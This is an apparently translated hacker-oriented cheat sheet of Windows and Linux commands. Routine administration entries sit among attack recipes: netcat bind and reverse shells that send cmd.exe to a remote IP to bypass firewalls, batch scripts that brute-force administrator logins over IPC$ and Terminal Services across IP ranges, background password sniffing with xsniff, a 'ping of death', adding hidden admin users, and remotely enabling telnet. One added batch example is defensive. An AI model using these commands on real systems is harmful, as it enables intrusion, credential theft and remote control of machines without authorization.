"Windows Common Commands"

Source: Internet
Author: User

net use \\ip\ipc$ "" /user:""   establishes an IPC$ null-session connection
net use \\ip\ipc$ "password" /user:"username"   establishes an authenticated (non-null) IPC$ connection
net use h: \\ip\c$ "password" /user:"username"   maps the remote host's C: drive to local H:
net use H: \\ip\c$   after logging in, maps the remote C: drive to local H:
net use \\ip\ipc$ /del   removes the IPC$ connection
net use H: /del   deletes the mapping of the remote drive to local H:
net user username password /add   creates a user
net user Guest /active:yes   activates the Guest account
net user   lists the existing users
net user accountname   shows the properties of the account
net localgroup Administrators username /add   adds "username" to the Administrators group so that it has administrator privileges. Note: Administrators, with the plural s
net start   shows which services are running
net start servicename   starts a service (e.g. net start Telnet, net start schedule)
net stop servicename   stops a service
net time \\targetip   shows the target host's time
net time \\targetip /set   synchronizes the local computer's clock with the "target ip" host; adding the /yes parameter skips the confirmation prompt
net view   shows which shares are open within the local network
net view \\ip   shows which shares are open on the remote host
net config   displays the system's network settings
net logoff   disconnects shares
net pause servicename   pauses a service
net send ip "text message"   sends a message to the other host
net ver   shows the type and information of the LAN network connection in use
net share   shows the locally enabled shares
net share ipc$   turns on the ipc$ share
net share ipc$ /del   deletes the ipc$ share
net share c$ /del   deletes the c$ share
net user Guest 12345   after logging in as Guest, changes the Guest password to 12345
net password password   changes the system login password
netstat -a   shows which ports are open; commonly used as netstat -an
netstat -n   shows port network connections; commonly used as netstat -an
netstat -v   shows work in progress
netstat -p protocolname   e.g. netstat -p tcp/ip shows the usage of one protocol (here TCP/IP)
netstat -s   shows the usage of all protocols in use
nbtstat -A ip   if one of ports 136 to 139 is open, shows the name of the user who last logged in (the user name in front of <03>). Note: the -A parameter is uppercase
tracert -parameter ip (or computer name)   traces the route taken by packets; the parameter "-w number" sets the timeout interval
ping ip (or domain name)   sends data with a default size of 32 bytes to the other host; parameters: "-l [space] packet size", "-n number of packets to send", "-t" pings continuously
ping -t -l 65550 ip   ping of death (sending packets larger than 64K continuously is the ping of death)
ipconfig (winipcfg)   on Windows NT and XP (Windows 95/98), shows the local IP address; the ipconfig parameter "/all" shows all configuration information
tlist -t   shows processes as a tree (an additional system tool, not installed by default, located in the Support\tools folder of the installation directory)
kill -f processname   the -f parameter forcibly ends a process (an additional system tool, not installed by default, located in the Support\tools folder of the installation directory)
del /f filename   the /f parameter deletes read-only files; /ar, /ah, /as, /aa delete read-only, hidden, system and archive files respectively; /a-r, /a-h, /a-s, /a-a delete all files except read-only, hidden, system and archive files respectively. For example, "del /ar *.*" deletes all read-only files in the current directory; "del /a-s *.*" deletes all files except system files in the current directory
del /s /q directory   or rmdir /s /q directory   /s deletes all subdirectories and files under the directory; adding /q skips the system confirmation so the deletion proceeds directly (both commands are used the same way)
move driveletter\path\filename destinationpath\filename   moves a file; the /y parameter cancels the confirmation prompt when the destination directory contains a file of the same name and overwrites it directly
fc one.txt two.txt > 3st.txt   compares two files and writes the differences to the file 3st.txt; ">" and ">>" are redirection operators
at id   starts a registered scheduled task
at /delete   stops all scheduled tasks; with the /yes parameter, stops them directly without confirmation
at id /delete   stops a registered scheduled task
at   shows all scheduled tasks
at \\ip time programname (or a command) /r   runs the program on the other host at the given time and restarts the computer
finger username@host   shows which users have logged in recently
telnet ip port   remote login to a server; the default port is 23
open ip   connects to ip (used after the telnet login command)
telnet   on the local machine, typing telnet by itself enters the local telnet
copy path\filename1 path\filename2 /y   copies file 1 to the specified directory as file 2; the /y parameter also cancels the confirmation prompt when overwriting an existing file in the directory
copy c:\srv.exe \\ip\admin$   copies the local c:\srv.exe to the other host's admin$ share
copy 1st.jpg /b + 2st.txt /a 3st.jpg   hides the contents of 2st.txt inside 1st.jpg, producing the new file 3st.jpg. Note: leave three empty lines at the start of 2st.txt. Parameters: /b means a binary file, /a means an ASCII file
copy \\ip\admin$\srv.exe c:\   or copy \\ip\admin$\*.* c:\   copies srv.exe (or all files) from the other host's admin$ share to the local C: drive
xcopy file-or-directory-tree destination\directoryname   copies files and the directory tree; with the /y parameter it will not prompt before overwriting files of the same name
tftp -i own-ip get server.exe c:\server.exe   (when using a compromised host as a pivot, use that host's ip) after logging in, downloads server.exe from "ip" to the target host's c:\server.exe. Parameter: -i means binary mode transfer, e.g. for exe files; without -i the transfer is in ASCII mode (text file mode)
tftp -i other-ip put c:\server.exe   after logging in, uploads the local c:\server.exe to the host
ftp ip port   used to upload files to a server or for file operations; the default port is 21. bin means binary transfer (executable files); the default is ASCII (text files)
route print   shows the IP routing table, mainly the network address, netmask, gateway address and interface address
arp   views and manages the ARP cache; ARP stands for address resolution, resolving an IP into a physical MAC address. arp -a shows all entries
start programname-or-command /max or /min   opens a new window and runs the program or command maximized (minimized)
mem   shows CPU usage
attrib filename (directoryname)   shows the attributes of a file (directory)
attrib filename -a -r -s -h or +a +r +s +h   removes (adds) the archive, read-only, system and hidden attributes of a file; + adds the attribute
dir   lists files; parameters: /q shows which user owns each file and directory; /t:c shows the file creation time; /t:a the last access time; /t:w the last modified time
date /t, time /t   with this parameter, "date /t" and "time /t" only display the current date and time without prompting for a new date and time
set variablename=string   sets the environment variable to the string
set   shows all current environment variables
set p (or another character)   shows all environment variables whose names start with p (or the other character)
pause   pauses batch processing and displays: Press any key to continue ....
if   performs conditional processing in a batch program (see the if command and variables below for more detail)
goto label   directs cmd.exe to a labeled line in the batch program (the label must be on a separate line and preceded by a colon, for example the ":start" label)
call path\batchfilename   calls another batch program from a batch program (for more instructions see call /?)
for   executes a specific command for each file in a set of files (see the for command and variables below for more detail)
echo on or off   turns echo on or off; echo with no parameters displays the current echo setting
echo message   displays the message on the screen
echo info >> pass.txt   appends "info" to the file pass.txt
findstr "Hello" aa.txt   searches for the string Hello in the file aa.txt
find filename   finds a file
title titlename   changes the title of the cmd window
color value   sets the foreground and background colors of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = violet, 6 = yellow, 7 = white, 8 = gray, 9 = blue, a = green, b = light aqua, c = light red, d = light purple, e = yellow, f = bright white
prompt name   changes the cmd.exe command prompt (e.g. changes C:\ or D:\ to entsky\)
print filename   prints a text file

ver   displays version information in a DOS window
winver   pops up a window displaying version information (memory size, system version, patch version, computer name)
format driveletter /fs:type   formats a disk; type: FAT, FAT32, NTFS; example: format d: /fs:ntfs
md directoryname   creates a directory
replace sourcefile destinationdirectory   replaces the file in the destination directory with the source file
ren oldfilename newfilename   renames a file
tree   displays the directory tree; with the /f parameter, lists the file names in each folder
type filename   displays the contents of a text file
more filename   displays a file one screen at a time
doskey command-to-lock=character   / doskey command-to-unlock=   locks or unlocks a command (doskey is provided for DOS: editing the command line, recalling Win2K commands and creating macros). E.g. to lock the dir command: doskey dir=entsky (doskey dir=dir cannot be used); to unlock: doskey dir=
taskmgr   brings up Task Manager
chkdsk /f d:   checks disk D and displays a status report; the /f parameter also repairs errors on the disk
tlntadmn   telnet service administration; type tlntadmn, select 3, then select 8 to change the telnet service's default port 23 to any other port
exit   exits the cmd.exe program or the current batch script; with the /b parameter exits the current batch script rather than cmd.exe
path path\filename-of-executable   sets the search path for an executable file
cmd   launches a Win2K command interpreter window. Parameters: /e:off, /e:on turn command extensions off or on; see cmd /? for details
regedit /s registryfilename   imports a registry file; /s means silent import without any prompt
regedit /e registryfilename   exports the registry
cacls filename parameter   displays or modifies file access control lists (ACLs) on NTFS volumes. Parameters: /d username denies the user access; /p username perm replaces the specified user's access rights; /g username perm grants the specified user access rights; perm can be N none, R read, W write, C change (write), F full control. Example: cacls d:\test.txt /d pub denies user pub access to d:\test.txt
cacls filename   shows the list of users' access rights for the file
rem text   adds a comment to a batch file
netsh   views or changes the local network configuration

IIS service commands:
iisreset /reboot   restarts the Win2K computer (a message that the system will restart is shown)
iisreset /start or /stop   starts (stops) all Internet services
iisreset /restart   stops and then restarts all Internet services
iisreset /status   shows the status of all Internet services
iisreset /enable or /disable   enables (disables) restarting of Internet services on the local system
iisreset /rebootonerror   if an error occurs when starting, stopping or restarting Internet services, the computer is restarted
iisreset /noforce   if Internet services cannot be stopped, they will not be forcibly terminated
iisreset /timeout val   the time in seconds to wait for Internet services to stop; if the /rebootonerror parameter is specified and the timeout expires, the computer reboots. Default values are 20 seconds for restart, 60 seconds for stop and 0 seconds for reboot
FTP commands: (explained in detail later)
The ftp command line format is:
ftp -v -d -i -n -g [hostname]
-v displays all response information from the remote server
-d uses debug mode
-n restricts automatic login, i.e. the .netrc file is not used
-g cancels file name globbing
help [command] or ? [command]   shows a command description
bye or quit   terminates the FTP session with the host and exits FTP mode
pwd   shows the current remote host directory
put or send localfile [remotefile]   transfers a local file to the remote host
get or recv [remotefile] [localfile]   transfers a file from the remote host to the local host
mget [remote-files]   receives a batch of files from the remote host to the local host
mput local-files   transfers a batch of files from the local host to the remote host
dir or ls [remote-directory] [local-file]   lists the files in the current remote host directory; if a local file is given, the result is written to it
ascii   sets ASCII transfer mode (the default)
bin or image   sets binary transfer mode
bell   rings a bell after each file transfer
cdup   returns to the parent directory
close   ends the FTP session with the remote server (the counterpart of open)
open host [port]   establishes a connection to the specified FTP server on the specified port
delete   deletes a file on the remote host
mdelete [remote-files]   deletes a batch of files
mkdir directory-name   creates a directory on the remote host
rename [from] [to]   renames a file on the remote host
rmdir directory-name   deletes a directory on the remote host
status   shows the current FTP status
system   shows the remote host's system type
user user-name [password] [account]   logs in to the remote host again with another user name
open host [port]   re-establishes a new connection
prompt   toggles interactive prompt mode
macdef   defines a macro command
lcd   changes the working directory on the local host; with no argument, changes to the current user's home directory
chmod   changes file permissions on the remote host
case   when on, file names copied to the local machine with mget are converted to lowercase
cd remote-dir   enters the remote host directory
cdup   enters the parent directory of the remote host directory
!   runs an interactive shell on the local machine; exit returns to the FTP environment, e.g. !ls *.zip

MySQL commands:
mysql -h host -u username -p password   connects to mysql; on a fresh MySQL installation the superuser root has no password.
(Example: mysql -h110.110.110.110 -uroot -p123456
Note: -u and root may be written without a space between them; the others are the same)
exit   exits MySQL
mysqladmin -u username -p oldpassword password newpassword   changes a password
grant select on database.* to username@loginhost identified by "password";   adds a new user. (Note: unlike the commands above, the following are commands within the MySQL environment, so they end with a semicolon as the command terminator)
show databases;   shows the list of databases. Initially there are two databases: mysql and test. The mysql database is very important: it holds MySQL's system information, and changing a password or adding a user actually operates on this database.
use mysql;
show tables;   shows the tables in a database
describe tablename;   shows the structure of a table
create database name;   creates a database
use dbname;
create table tablename (field definitions);
drop database name;
drop table name;   delete a database / delete a table
delete from tablename;   empties the records in a table
select * from tablename;   shows the records in a table
mysqldump --opt school>school.bbb   backs up a database (run from the DOS \mysql\bin directory). Note: backs up the database school to the file school.bbb; school.bbb is a text file, the file name is arbitrary, open it and see what you will find.
New commands on Windows 2003 (practical section):
shutdown /parameters   shuts down or restarts the local or remote host.
Parameter description: /s shuts down the host; /r restarts the host; /t number sets the delay, range 0 to 180 seconds; /a cancels the shutdown; /m \\ip specifies the remote host.
Example: shutdown /r /t 0 restarts the local host immediately (no delay)
taskkill /parameter processname-or-pid   terminates one or more tasks and processes.
Parameter description: /pid the PID of the process to terminate (the tasklist command can be used to obtain each process's PID); /im the name of the process to terminate; /f forcibly terminates the process; /t terminates the specified process and the child processes it started.
tasklist   displays the processes, services and process identifiers (PID) currently running on the local or remote host.
Parameter description: /m lists the DLL files loaded by each process; /svc shows the services corresponding to each process. With no parameter only the current processes are listed.

Linux basic commands (case-sensitive):
uname   shows version information (like Win2K ver)
dir   shows the files in the current directory; ls -al also shows hidden files (like Win2K dir)
pwd   shows the current directory location
cd   cd .. goes back one level; note the space between cd and the dots. cd / returns to the root directory.
cat filename   shows the contents of a file
cat >abc.txt   writes input into the file abc.txt
more filename   displays a text file page by page
cp   copies a file
mv   moves a file
rm filename   deletes a file; rm -a directoryname deletes a directory and its subdirectories
mkdir directoryname   creates a directory
rmdir   deletes a subdirectory; the directory must contain no files
chmod   sets access permissions on files or directories
grep   searches for a string in a file
diff   compares files
find   searches for files
date   shows the date and time
who   shows who is currently logged in on the same machine as you, with login time and location
w   shows details of the people currently on the machine
whoami   shows your account name
groups   shows a user's groups
passwd   changes the password
history   shows the commands you have entered
ps   shows process status
kill   stops a process
gcc   hackers usually use it to compile files written in C
su   switches privileges to the specified user
telnet ip   telnet connects to the other host (like Win2K); a bash$ prompt indicates that the connection succeeded
ftp   FTP connection to a server (like Win2K)

Appendix: batch commands and variables

1: the for command and variables. Basic format:
for /parameter %variable in (set) do command [command_parameters]
%variable: specifies a single-letter replaceable parameter, e.g. %i. When defining a variable in a batch file use %%i; when calling a variable use %i%; variables are case-sensitive (%i is not equal to %I).
Each batch file can handle 10 variables, %0 to %9, where %0 is the batch file name by default and %1 is by default the first value entered when the batch is run; likewise %2 to %9 refer to the 2nd to 9th values entered. E.g. in net use \\ip\ipc$ pass /user:user, ip is %1, pass is %2 and user is %3
(set): specifies a file or a set of files; wildcards may be used, e.g. (d:\user.txt), (1 1 254) or (1 -1 254). {In "(1 1 254)" the first "1" is the start value, the second "1" is the step and "254" is the end value, i.e. from 1 to 254; "(1 -1 254)" means from 254 to 1}
command: specifies the command to execute for each file, e.g. the net use command; to execute several commands, separate them with &
command_parameters: specifies parameters or command-line switches for the specific command
in (set): refers to the values in (set); do command: refers to the command
Parameters: /l means increment form {when (set) is an increment range}; /f means taking values from a file {when (set) is a file, e.g. (d:\pass.txt)} until the file is exhausted.
Usage examples:
@echo off
echo usage format: test.bat *.*.* > test.txt
for /l %%g in (1 1 254) do echo %1.%%g >>test.txt & net use \\%1.%%g /user:administrator | find "command completed successfully" >>test.txt
Save as test.bat. Description: for the 254 IPs of the specified class C segment, tries to establish an ipc$ connection as administrator with an empty password; on success the IP is recorded in test.txt.
/l means increment form (i.e. from 1 to 254 or 254 to 1); the first three octets entered, *.*.*, are the batch's default %1; %%g is the variable (the last octet of the IP); & separates the two commands echo and net use; | after the ipc$ attempt, find searches the output for the "command completed successfully" message; %1.%%g is the full IP address; (1 1 254) gives the start value, the step and the end value.
@echo off
echo usage format: ok.bat ip
for /f %%i in (d:\user.dic) do smb.exe %1 %%i d:\pass.dic 200
Save as ok.bat. Description: after entering an IP, uses the dictionary file d:\pass.dic to brute-force the passwords of the users listed in d:\user.dic until the values are exhausted. %%i is the user name; %1 is the IP entered (the default).

2: the if command and variables. Basic format:
if [not] errorlevel number command   if the last program run returned an exit code equal to or greater than the number, the condition is true.
Example: if errorlevel 0 command means that if the previous program returned 0, the command on that line is executed; if errorlevel 1 command means that if the value returned by the previous program is not equal to 1, the following command is executed.
0 means found and executed successfully (true); 1 means not found, not executed (false).
if [not] string1==string2 command   if the specified strings match (i.e. string1 equals string2), the following command is executed.
Example: if "%2%"=="4" goto start means: if the second variable entered is 4, execute the following command (note the %variablename% and "" when calling a variable)
if [not] exist filename command   if the specified file exists, the following command is executed.
Example: if not exist nc.exe goto end means: if the file nc.exe is not found, jump to the ":end" label.
if [not] errorlevel number command else command, or if [not] string1==string2 command else command, or if [not] exist filename command else command   the else command refers to the command after else, which is executed when the preceding condition is not true. Note: else is only valid on the same line as if. When a del command is used, the whole del command must be enclosed in < >, because the del command only executes on a separate line, and enclosing it in < > is equivalent to a separate line, for example: "if exist test.txt. else echo test.txt.missing"; note the "." in the command
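An added example (not from the original page) that applies the for /f, %%variable, %1, call, if exist, if errorlevel and >> constructs described above to a defensive task: reading a list of service names from a file and recording which of them are running. The file names svccheck.bat, services.txt and report.txt are assumptions.

```batch
@echo off
rem svccheck.bat - added example, not part of the original page.
rem Usage: svccheck.bat services.txt report.txt
rem services.txt (assumed): one service display name per line, e.g. Telnet
rem report.txt  (assumed): receives one RUNNING/STOPPED line per service
if "%~2"=="" goto usage
if not exist "%~1" goto nofile

rem the first echo overwrites the report; the later echos append to it
echo service check on %COMPUTERNAME% at %DATE% %TIME% > "%~2"

rem /f reads (set) line by line; %%s holds one line and is quoted so names with spaces survive
for /f "usebackq tokens=* delims=" %%s in ("%~1") do call :check "%%s" "%~2"
echo report written to %~2
goto :eof

:check
rem inside the subroutine %1 and %2 are the arguments passed by call, not the script's own
rem find exits with errorlevel 0 when the name appears in the net start output, 1 when it does not
rem (substring match: a short name such as Server also matches longer service names)
net start | find /i "%~1" > nul
rem "if errorlevel 1" is true for any exit code of 1 or more, so the else branch is the success case
if errorlevel 1 (echo STOPPED  %~1 >> "%~2") else (echo RUNNING  %~1 >> "%~2")
goto :eof

:nofile
echo %~1 not found
goto :eof

:usage
echo usage: svccheck.bat services.txt report.txt
```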


(ii) External commands (all require downloading the relevant tools):

1. Swiss Army knife: nc.exe

Parameter description:
-h   shows help information
-d   background mode
-e prog   program redirection, executed once a connection is made [dangerous]
-i secs   delay interval
-l   listen mode for inbound connections
-L   listen mode that keeps listening after a connection closes, until Ctrl+C
-n   numeric IP addresses only, no domain names
-o file   records a hex dump of the transmission to the file
-p[space] port   local port number
-r   random local and remote ports
-t   telnet interactive mode
-u   UDP mode
-v   verbose output; -vv is more detailed
-w number   timeout delay interval
-z   turns input and output off (used when scanning)
Basic usage:
nc -nvv 192.168.0.1 80   connects to port 80 of host 192.168.0.1
nc -l -p 80   opens local TCP port 80 and listens
nc -nvv -w2 -z 192.168.0.1 80-1024   scans ports 80-1024 of 192.168.0.1
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe   binds the remote host's cmd shell to remote TCP port 5354
nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354   binds the remote host's cmd shell and reverse connects to port 5354 of 192.168.0.2
Advanced usage:
nc -L -p 80   honeypot 1: opens and keeps listening on port 80 until Ctrl+C
nc -L -p 80 > c:\log.txt   honeypot 2: opens and keeps listening on port 80 until Ctrl+C and writes the results to c:\log.txt
nc -L -p 80 < c:\honeyport.txt   honeypot 3-1: opens and keeps listening on port 80 until Ctrl+C and sends the contents of c:\honeyport.txt into the pipe; can also serve to transfer a file
type.exe c:\honeyport.txt | nc -L -p 80   honeypot 3-2: opens and keeps listening on port 80 until Ctrl+C and sends the contents of c:\honeyport.txt into the pipe; can also serve to transfer a file
On the local machine: nc -l -p localport
On the other host: nc -e cmd.exe localip -p localport   *win2k
nc -e /bin/sh localip -p localport   *linux, unix   reverse connection to bypass the other host's firewall
On the local machine: nc -d -l -p localport < path-and-name-of-file-to-transfer
On the other host: nc -vv localip localport > path-and-name-of-file   transfers the file to the other host
Notes
|   pipe
< or >   redirection; "<" e.g. tlntadmn < test.txt feeds the contents of test.txt to the tlntadmn command as input
@   the command after @ is executed but not displayed (background execution); e.g. @dir c:\winnt >> d:\log.txt means dir is executed in the background and the result is stored in d:\log.txt
The difference between > and >>: ">" means overwrite; ">>" means append. E.g. run @dir c:\winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt twice each and compare: with >> both results are saved, with > only one, because the second result overwrites the first.

2. Scanning tool: xscan.exe

Basic format:
xscan -host <start ip>[-<stop ip>] <detection items> [other options]   scans all hosts in the range "start ip to stop ip"
xscan -file <hostlist file> <detection items> [other options]   scans all hosts listed in the file
Detection items:
-active   checks whether the host is alive
-os   detects the remote operating system type (via the NetBIOS and SNMP protocols)
-port   detects the port status of common services
-ftp   detects FTP weak passwords
-pub   detects anonymous write permission on the FTP service
-pop3   detects pop3-server weak passwords
-smtp   detects smtp-server vulnerabilities
-sql   detects sql-server weak passwords
-smb   detects nt-server weak passwords
-iis   detects IIS encoding/decoding vulnerabilities
-cgi   detects CGI vulnerabilities
-nasl   loads Nessus attack scripts
-all   detects all of the above items
Other options:
-i adapternumber   sets the network adapter; the <adapternumber> can be obtained with the -l parameter
-l   shows all network adapters
-v   shows detailed scan progress
-p   skips hosts that do not respond
-o   skips hosts with no detected open ports
-t threads,hosts   specifies the maximum number of concurrent threads and concurrent hosts; the defaults are 100,10
-log filename   specifies the scan report file name (suffix: txt or html format)
Usage examples:
xscan -host 192.168.1.1-192.168.255.255 -all -active -p   detects all of the above vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 segment, skipping unresponsive hosts
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o   detects the standard port status and NT weak-password users of hosts in the 192.168.1.1-192.168.255.255 segment, with up to 150 concurrent threads, skipping hosts with no detected open ports
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o   detects the standard port status and CGI vulnerabilities of all hosts listed in hostlist.txt, with up to 200 concurrent threads and up to 5 hosts at a time, showing detailed progress and skipping hosts with no detected open ports

3. Command-line sniffer: xsniff.exe
Can capture ftp/smtp/pop3/http protocol passwords on the LAN
Parameter description:
-tcp   outputs TCP datagrams
-udp   outputs UDP datagrams
-icmp   outputs ICMP datagrams
-pass   filters password information
-hide   runs in the background
-host   resolves host names
-addr ipaddress   filters by IP address
-port port   filters by port
-log filename   saves the output to a file
-asc   outputs in ASCII format
-hex   outputs in hexadecimal
Usage examples:
xsniff.exe -pass -hide -log pass.log   runs in the background sniffing passwords and saves the password information to the file pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1   sniffs 192.168.1.1, filtering TCP and UDP traffic and outputting in ASCII format


4. Terminal Services password cracking: tscrack.exe

Parameter description:
-h   shows help
-v   shows version information
-s   shows the on-screen decryption capability
-b   beeps when a password is wrong
-t   uses multiple connections (multi-threaded)
-N   prevents system log entries on the targeted server
-U   uninstalls and removes the tscrack component
-f   uses the password given after -f
-F   interval time (frequency)
-l   uses the user name given after -l
-w   uses the password dictionary given after -w
-p   uses the password given after -p
-D   login main page
Usage examples:
tscrack 192.168.0.1 -l administrator -w pass.dic   remotely brute-forces the host's administrator login password with a password dictionary file
tscrack 192.168.0.1 -l administrator -p 123456   remotely logs in to 192.168.0.1 as administrator with the password 123456
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims=" %%i in (3389.txt) do call hack.bat %%i
:noscan
@echo 3389.txt no find or scan faild
(① saved as 3389.bat) (assumes that an existing superscan or other scanner has produced a list of hosts with 3389 open, the IP list file 3389.txt)
3389.bat means: take an IP from the file 3389.txt, then run hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(② saved as hack.bat) (just run 3389.bat, with 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe in the same directory, and wait for the result.)
hack.bat means: run tscrack.exe with a dictionary to brute-force the administrator password of every host in 3389.txt and save the cracked results in the file rouji.txt.


5. Others:

shutdown.exe
shutdown \\ipaddress t:20   NT shuts down automatically after 20 seconds (this tool ships with Windows 2003; under Windows 2000 it must be downloaded. It is described in detail in the Windows 2003 DOS command section above.)
fpipe.exe (TCP port redirection tool)   described in detail in the second article (port redirection to bypass firewalls)
fpipe -l 80 -s 1029 -r www.sina.com.cn   when someone scans your port 80, the result they get is entirely the host information of www.sina.com.cn
fpipe -l 23 -s 88 -r 23 destination-ip   after port redirection, the local telnet request for port 23 of the destination ip is sent out through port 88 to port 23 of the destination ip (when you establish telnet with the destination ip, the connection goes through local port 88). Then: telnet 127.0.0.1 (the local ip) directly connects to port 23 of the destination ip.
opentelnet.exe (tool for remotely enabling telnet)
opentelnet.exe \\ip account password ntlm-authentication-mode telnet-port   (no need to upload ntlm.exe to defeat Microsoft's authentication) directly enables the other host's telnet service remotely; afterwards telnet \\ip connects to the other host.
NTLM authentication mode: 0: do not use NTLM authentication; 1: try NTLM authentication first and, if it fails, use the user name and password; 2: use only NTLM authentication.

resumetelnet.exe (another tool bundled with opentelnet)
resumetelnet.exe \\ip account password   after the telnet connection is finished, use this command to restore the other host's telnet settings and turn off the telnet service.

6. FTP commands in detail:

FTP commands are among the most frequently used commands for Internet users. Being familiar with FTP's internal commands and applying them flexibly can greatly help users and pay off many times over. If you want to learn to use FTP in the background, you must learn the FTP commands.

The ftp command line format is:
ftp -v -d -i -n -g [hostname], where
-v displays all response information from the remote server;
-n restricts FTP automatic login, i.e. does not use the .netrc file;
-d uses debug mode;
-g cancels file name globbing
